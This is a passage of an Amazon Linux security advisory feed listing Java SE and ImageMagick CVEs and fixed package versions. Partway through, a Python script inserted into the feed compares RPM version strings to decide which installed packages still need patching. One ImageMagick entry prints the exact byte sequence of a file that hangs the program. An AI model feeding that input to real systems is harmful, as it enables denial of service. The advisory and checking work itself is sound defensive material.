Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Security). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2020-2757:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2020-2756:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2020-2755:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Scripting). Supported versions that are affected are Java SE: 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2020-2754:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Scripting). Supported versions that are affected are Java SE: 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
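The package lists in these advisories give the fixed NEVRA; whether an instance is still exposed is decided by comparing the installed epoch:version-release against it using rpm's ordering, not a string comparison and not the upstream version named in the CVE text. Two things on this page make the naive checks wrong: transfig is fixed in 3.2.7b-10.8.amzn1, a backport, so the CVE text's "fixed in 3.2.8" would flag the patched package; and transfig and java-1.8.0-openjdk carry epoch 1, which the .rpm filenames omit. The Python below is an added example, not rpm's or yum's code: rpmvercmp follows rpm's segment rules (digit runs versus letter runs, leading zeros ignored, numeric newer than alphabetic, '~' sorts before anything, '^' not handled), and FIXED copies four entries from this page.

```python
"""
RPM EVR comparison against the fixed NEVRAs published in an updateinfo feed.
Added example, not rpm's or yum's code: rpmvercmp() follows rpm's segment
ordering (digit runs vs letter runs, leading zeros ignored, numeric beats
alphabetic, '~' sorts before everything, '^' not handled).
"""
import re

# A version splits into digit runs and letter runs; '~' is its own token and
# every other character is a separator.
_SEG = re.compile(r"[0-9]+|[a-zA-Z]+|~")

# Fixed (epoch, version, release) copied from the advisories on this page.
FIXED = {
    "kernel": ("0", "4.14.322", "170.535.amzn1"),
    "openldap": ("0", "2.4.40", "16.37.amzn1"),
    "transfig": ("1", "3.2.7b", "10.8.amzn1"),          # backport, still 3.2.7b
    "java-1.8.0-openjdk": ("1", "1.8.0.252.b09", "2.51.amzn1"),
}


def rpmvercmp(a, b):
    """Return 1 if a sorts newer than b, -1 if older, 0 if equal."""
    if a == b:
        return 0
    sa, sb = _SEG.findall(a), _SEG.findall(b)
    for x, y in zip(sa, sb):
        if x == "~" or y == "~":
            if x != "~":
                return 1        # b has a pre-release marker here, a does not
            if y != "~":
                return -1
            continue
        x_num, y_num = x.isdigit(), y.isdigit()
        if x_num != y_num:
            return 1 if x_num else -1   # numeric segment is newer than alpha
        if x_num:
            xi, yi = int(x), int(y)     # int() discards leading zeros
            if xi != yi:
                return 1 if xi > yi else -1
        elif x != y:
            return 1 if x > y else -1   # plain byte order, as strcmp
    if len(sa) == len(sb):
        return 0
    # Shared prefix: the longer one is newer unless its extra part is '~'.
    a_longer = len(sa) > len(sb)
    extra = (sa if a_longer else sb)[min(len(sa), len(sb))]
    if extra == "~":
        return -1 if a_longer else 1
    return 1 if a_longer else -1


def evr_cmp(evr_a, evr_b):
    """Compare (epoch, version, release) triples; a higher epoch wins outright."""
    ea, eb = int(evr_a[0] or 0), int(evr_b[0] or 0)
    if ea != eb:
        return 1 if ea > eb else -1
    c = rpmvercmp(evr_a[1], evr_b[1])
    if c != 0:
        return c
    return rpmvercmp(evr_a[2], evr_b[2])


def is_vulnerable(name, installed_evr):
    """True when the installed package is older than the advisory's fix."""
    fixed = FIXED.get(name)
    if fixed is None:
        return False            # no advisory on this page for that package
    return evr_cmp(installed_evr, fixed) == -1
```

Feed it the installed values from rpm -q --qf '%{NAME} %{EPOCHNUM} %{VERSION} %{RELEASE}\n' PACKAGE; %{EPOCHNUM} prints 0 where the package has no epoch, whereas %{EPOCH} prints (none). Do not derive the epoch from the filename, since it is not there.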
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2754" title="" id="CVE-2020-2754" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2755" title="" id="CVE-2020-2755" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2756" title="" id="CVE-2020-2756" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2757" title="" id="CVE-2020-2757" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2773" title="" id="CVE-2020-2773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2781" title="" id="CVE-2020-2781" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2800" title="" id="CVE-2020-2800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2803" title="" id="CVE-2020-2803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2805" title="" id="CVE-2020-2805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2830" title="" id="CVE-2020-2830" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-demo" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.252.b09-2.51.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.252.b09-2.51.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.252.b09-2.51.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" 
version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.252.b09-2.51.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.252.b09-2.51.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.252.b09-2.51.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.252.b09-2.51.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.252.b09-2.51.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.252.b09-2.51.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.252.b09-2.51.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.252.b09-2.51.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.252.b09-2.51.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.252.b09-2.51.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.252.b09-2.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1810</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1810: medium priority package update for php54-pecl-imagick</title><issued date="2023-08-21 12:14:00" /><updated date="2023-08-23 02:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9956:
In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file.
CVE-2019-7398:
In ImageMagick before 7.0.8-25, a memory leak exists in WriteDIBImage in coders/dib.c.
CVE-2019-7397:
In ImageMagick before 7.0.8-25 and GraphicsMagick through 1.3.31, several memory leaks exist in WritePDFImage in coders/pdf.c.
CVE-2019-7175:
In ImageMagick before 7.0.8-25, some memory leaks exist in DecodeImage in coders/pcd.c.
CVE-2019-19949:
An out-of-bounds read was discovered in ImageMagick when writing PNG images. An attacker may abuse this flaw to trick a victim user into downloading a malicious image file and running it through ImageMagick, causing the application to crash.
CVE-2019-19948:
A heap-based buffer overflow flaw was discovered in ImageMagick when writing SGI images with improper columns and rows properties. An attacker may trick a victim user into downloading a malicious image file and running it through ImageMagick, possibly executing code on the victim user's system.
CVE-2019-17541:
ImageMagick before 7.0.8-55 has a use-after-free in DestroyStringInfo in MagickCore/string.c because the error manager is mishandled in coders/jpeg.c.
CVE-2019-17540:
ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.
CVE-2019-16713:
ImageMagick 7.0.8-43 has a memory leak in coders/dot.c, as demonstrated by PingImage in MagickCore/constitute.c.
CVE-2019-16712:
ImageMagick 7.0.8-43 has a memory leak in Huffman2DEncodeImage in coders/ps3.c, as demonstrated by WritePS3Image.
CVE-2019-16711:
ImageMagick 7.0.8-40 has a memory leak in Huffman2DEncodeImage in coders/ps2.c.
CVE-2019-16710:
ImageMagick 7.0.8-35 has a memory leak in coders/dot.c, as demonstrated by AcquireMagickMemory in MagickCore/memory.c.
CVE-2019-16709:
ImageMagick 7.0.8-35 has a memory leak in coders/dps.c, as demonstrated by XCreateImage.
CVE-2019-16708:
ImageMagick 7.0.8-35 has a memory leak in magick/xwindow.c, related to XCreateImage.
CVE-2019-15141:
WriteTIFFImage in coders/tiff.c in ImageMagick 7.0.8-43 Q16 allows attackers to cause a denial-of-service (application crash resulting from a heap-based buffer over-read) via a crafted TIFF image file, related to TIFFRewriteDirectory, TIFFWriteDirectory, TIFFWriteDirectorySec, and TIFFWriteDirectoryTagColormap in tif_dirwrite.c of LibTIFF. NOTE: this occurs because of an incomplete fix for CVE-2019-11597.
CVE-2019-15140:
coders/mat.c in ImageMagick 7.0.8-43 Q16 allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly have unspecified other impact by crafting a Matlab image file that is mishandled in ReadImage in MagickCore/constitute.c.
CVE-2019-15139:
The XWD image (X Window System window dumping file) parsing component in ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (application crash resulting from an out-of-bounds Read) in ReadXWDImage in coders/xwd.c by crafting a corrupted XWD image file, a different vulnerability than CVE-2019-11472.
CVE-2019-14981:
In ImageMagick 7.x before 7.0.8-41 and 6.x before 6.9.10-41, there is a divide-by-zero vulnerability in the MeanShiftImage function. It allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-14980:
In ImageMagick 7.x before 7.0.8-42 and 6.x before 6.9.10-42, there is a use after free vulnerability in the UnmapBlob function that allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-13454:
ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c.
CVE-2019-13311:
A flaw was found in ImageMagick, containing memory leaks of AcquireMagickMemory due to a wand/mogrify.c error. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
CVE-2019-13310:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to an error found in MagickWand/mogrify.c. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13309:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to the mishandling of the NoSuchImage error in CLIListOperatorImages in MagickWand/operation.c. It was discovered that ImageMagick does not properly release acquired memory in function MogrifyImageList() when some error conditions are met, or the "compare" option is used. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13307:
A heap-based buffer overflow was discovered in ImageMagick in the way it parses images when using the evaluate-sequence option. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13306:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13305:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced strncpy and off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13304:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced assignment. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13301:
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
CVE-2019-13300:
A heap-based buffer overflow was discovered in ImageMagick in the way it applies a value with arithmetic, relational, or logical operators to an image due to mishandling columns. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13297:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a height of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13295:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a width of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13135:
ImageMagick before 7.0.8-50 has a "use of uninitialized value" vulnerability in the function ReadCUTImage in coders/cut.c.
CVE-2019-13134:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c.
CVE-2019-13133:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c.
CVE-2019-12979:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c.
CVE-2019-12978:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c.
CVE-2019-12976:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the ReadPCLImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12975:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the WriteDPXImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12974:
A NULL pointer dereference in the function ReadPANGOImage in coders/pango.c and the function ReadVIDImage in coders/vid.c in ImageMagick 7.0.8-34 allows remote attackers to cause a denial of service via a crafted image.
CVE-2019-11598:
In ImageMagick 7.0.8-40 Q16, there is a heap-based buffer over-read in the function WritePNMImage of coders/pnm.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. This is related to SetGrayscaleImage in MagickCore/quantize.c.
CVE-2019-11597:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file.
CVE-2019-11472:
ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first.
CVE-2019-11470:
The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs because ReadCINImage in coders/cin.c lacks a check for insufficient image data in a file.
CVE-2019-10650:
In ImageMagick 7.0.8-36 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or information disclosure via a crafted image file.
CVE-2019-10131:
An off-by-one read vulnerability was discovered in ImageMagick in the formatIPTCfromBuffer function in coders/meta.c. A local attacker may use this flaw to read beyond the end of the buffer or to crash the program.
CVE-2018-9133:
ImageMagick 7.0.7-26 Q16 has excessive iteration in the DecodeLabImage and EncodeLabImage functions (coders/tiff.c), which results in a hang (tens of minutes) with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted tiff file.
CVE-2018-8804:
WriteEPTImage in coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote attackers to cause a denial of service (MagickCore/memory.c double free and application crash) or possibly have unspecified other impact via a crafted file.
CVE-2018-20467:
In coders/bmp.c in ImageMagick before 7.0.8-16, an input file can result in an infinite loop and hang, with high CPU and memory consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-18544:
There is a memory leak in the function WriteMSLImage of coders/msl.c in ImageMagick 7.0.8-13 Q16, and the function ProcessMSLScript of coders/msl.c in GraphicsMagick before 1.3.31.
CVE-2018-16750:
In ImageMagick 7.0.7-29 and earlier, a memory leak in the formatIPTCfromBuffer function in coders/meta.c was found.
CVE-2018-16749:
In ImageMagick 7.0.7-29 and earlier, a missing NULL check in ReadOneJNGImage in coders/png.c allows an attacker to cause a denial of service (WriteBlob assertion failure and application exit) via a crafted file.
CVE-2018-16328:
In ImageMagick before 7.0.8-8, a NULL pointer dereference exists in the CheckEventLogging function in MagickCore/log.c.
CVE-2018-15607:
In ImageMagick 7.0.8-11 Q16, a tiny input file 0x50 0x36 0x36 0x36 0x36 0x4c 0x36 0x38 0x36 0x36 0x36 0x36 0x36 0x36 0x1f 0x35 0x50 0x00 can result in a hang of several minutes during which CPU and memory resources are consumed until ultimately an attempted large memory allocation fails. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-14437:
ImageMagick 7.0.8-4 has a memory leak in parse8BIM in coders/meta.c.
CVE-2018-14436:
ImageMagick 7.0.8-4 has a memory leak in ReadMIFFImage in coders/miff.c.
CVE-2018-14435:
ImageMagick 7.0.8-4 has a memory leak in DecodeImage in coders/pcd.c.
CVE-2018-14434:
ImageMagick 7.0.8-4 has a memory leak for a colormap in WriteMPCImage in coders/mpc.c.
CVE-2018-13153:
A memory leak was discovered in ImageMagick in the XMagickCommand function in animate.c file. An array of strings, named filelist, is allocated on the heap but not released in case the function ExpandFilenames returns an error code.
CVE-2018-12600:
In ImageMagick 7.0.8-3 Q16, ReadDIBImage and WriteDIBImage in coders/dib.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-12599:
In ImageMagick 7.0.8-3 Q16, ReadBMPImage and WriteBMPImage in coders/bmp.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-11656:
In ImageMagick 7.0.7-20 Q16 x86_64, a memory leak vulnerability was found in the function ReadDCMImage in coders/dcm.c, which allows attackers to cause a denial of service via a crafted DCM image file.
CVE-2018-10805:
ImageMagick version 7.0.7-28 contains a memory leak in ReadYCBCRImage in coders/ycbcr.c.
CVE-2018-10804:
ImageMagick version 7.0.7-28 contains a memory leak in WriteTIFFImage in coders/tiff.c.
CVE-2018-10177:
An infinite loop has been found in the way ImageMagick reads Multiple-image Network Graphics (MNG) data. An attacker could exploit this to cause a denial of service via crafted MNG file.
CVE-2017-18273:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadTXTImage in coders/txt.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted image file that is mishandled in a GetImageIndexInList call.
CVE-2017-18271:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadMIFFImage in coders/miff.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted MIFF image file.
CVE-2017-18254:
A memory leak vulnerability has been discovered in ImageMagick in the WriteGIFImage function of coders/gif.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-18252:
An issue was discovered in ImageMagick 7.0.7. The MogrifyImageList function in MagickWand/mogrify.c allows attackers to cause a denial of service (assertion failure and application exit in ReplaceImageInList) via a crafted file.
CVE-2017-18251:
A memory leak vulnerability has been discovered in ImageMagick in the ReadPCDImage function of coders/pcd.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-12806:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function format8BIM, which allows attackers to cause a denial of service.
CVE-2017-12805:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function ReadTIFFImage, which allows attackers to cause a denial of service.
CVE-2017-11166:
The ReadXWDImage function in coders/xwd.c in ImageMagick 7.0.5-6 has a memory leak vulnerability that can cause memory exhaustion via a crafted length (number of color-map entries) field in the header of an XWD file.
CVE-2017-1000476:
In ImageMagick 7.0.7-12 Q16, a CPU exhaustion vulnerability was found in the function ReadDDSInfo in coders/dds.c, which allows attackers to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000476" title="" id="CVE-2017-1000476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11166" title="" id="CVE-2017-11166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12805" title="" id="CVE-2017-12805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12806" title="" id="CVE-2017-12806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18251" title="" id="CVE-2017-18251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18252" title="" id="CVE-2017-18252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18254" title="" id="CVE-2017-18254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18271" title="" id="CVE-2017-18271" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18273" title="" id="CVE-2017-18273" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10177" title="" id="CVE-2018-10177" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10804" title="" id="CVE-2018-10804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10805" title="" id="CVE-2018-10805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11656" title="" id="CVE-2018-11656" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12599" title="" id="CVE-2018-12599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12600" title="" id="CVE-2018-12600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13153" title="" id="CVE-2018-13153" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14434" title="" id="CVE-2018-14434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14435" title="" id="CVE-2018-14435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14436" title="" id="CVE-2018-14436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14437" title="" id="CVE-2018-14437" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15607" title="" id="CVE-2018-15607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16328" title="" id="CVE-2018-16328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16749" title="" id="CVE-2018-16749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16750" title="" id="CVE-2018-16750" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18544" title="" id="CVE-2018-18544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20467" title="" id="CVE-2018-20467" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8804" title="" id="CVE-2018-8804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9133" title="" id="CVE-2018-9133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10131" title="" id="CVE-2019-10131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10650" title="" id="CVE-2019-10650" 